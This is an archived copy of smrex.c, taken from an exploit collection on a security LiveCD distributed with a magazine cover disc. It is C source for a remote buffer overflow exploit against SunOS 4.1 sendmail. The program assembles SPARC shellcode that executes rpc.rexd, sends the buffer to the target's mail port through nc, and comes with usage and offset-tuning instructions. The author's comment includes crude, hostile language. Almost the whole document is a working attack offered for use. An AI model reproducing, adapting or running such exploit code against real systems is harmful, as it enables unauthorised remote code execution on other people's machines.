Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / remote / smrex.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 3.1 KB | 94 lines

/* * Overflow for Sunos 4.1 sendmail - execs /usr/etc/rpc.rexd. * If you don't know what to do from there, kill yourself. * Remote stack pointer is guessed, the offset from it to the code is 188. * * Use: smrex buffersize padding |nc hostname 25 * * where `padding` is a small integer, 1 works on my sparc 1+ * * I use smrex 84 1, play with the numbers and see what happens. The core * gets dumped in /var/spool/mqueue if you fuck up, fire up adb, hit $r and * see where your offsets went wrong :) * * I don't *think* this is the 8lgm syslog() overflow - see how many versions * of sendmail this has carried over into and let me know. Or don't, I * wouldn't :) * * P.S. I'm *sure* there are cleverer ways of doing this overflow. So sue * me, I'm new to this overflow business..in my day everyone ran YPSERV and * things were far simpler... :) * * The Army of the Twelve Monkeys in '98 - still free, still kicking arse. */ #include <stdio.h> int main(int argc, char **argv) { long unsigned int large_string[10000]; int i, prelude; unsigned long offset; char padding[50]; offset = 188; /* Magic numbers */ prelude = atoi(argv[1]); if (argc < 2) { printf("Usage: %s bufsize <alignment offset> | nc target 25\n", argv[0]); exit(1); } for (i = 6; i < (6 + atoi(argv[2])); i++) { strcat(padding, "A"); } for(i = 0; i < prelude; i++) { large_string[i] = 0xfffffff0; /* Illegal instruction */ } large_string[prelude] = 0xf7ffef50; /* Arbitrary overwrite of %fp */ large_string[prelude + 1] = 0xf7fff00c; /* Works for me; address of code */ for( i = (prelude + 2); i < (prelude + 64); i++) { large_string[i] = 0xa61cc013; /* Lots of sparc NOP's */ } /* Now the sparc execve /usr/etc/rpc.rexd code.. */ large_string[prelude + 64] = 0x250bcbc8; large_string[prelude + 65] = 0xa414af75; large_string[prelude + 66] = 0x271cdc88; large_string[prelude + 67] = 0xa614ef65; large_string[prelude + 68] = 0x291d18c8; large_string[prelude + 69] = 0xa8152f72; large_string[prelude + 70] = 0x2b1c18c8; large_string[prelude + 71] = 0xaa156e72; large_string[prelude + 72] = 0x2d195e19; large_string[prelude + 73] = 0x900b800e; large_string[prelude + 74] = 0x9203a014; large_string[prelude + 75] = 0x941ac00b; large_string[prelude + 76] = 0x9c03a104; large_string[prelude + 77] = 0xe43bbefc; large_string[prelude + 78] = 0xe83bbf04; large_string[prelude + 79] = 0xec23bf0c; large_string[prelude + 80] = 0xdc23bf10; large_string[prelude + 81] = 0xc023bf14; large_string[prelude + 82] = 0x8210203b; large_string[prelude + 83] = 0xaa103fff; large_string[prelude + 84] = 0x91d56001; large_string[prelude + 85] = 0xa61cc013; large_string[prelude + 86] = 0xa61cc013; large_string[prelude + 87] = 0xa61cc013; large_string[prelude + 88] = 0; /* And finally, the overflow..simple, huh? :) */ printf("helo\n"); printf("mail from: %s%s\n", padding, large_string); } /* www.hack.co.za [2000]*/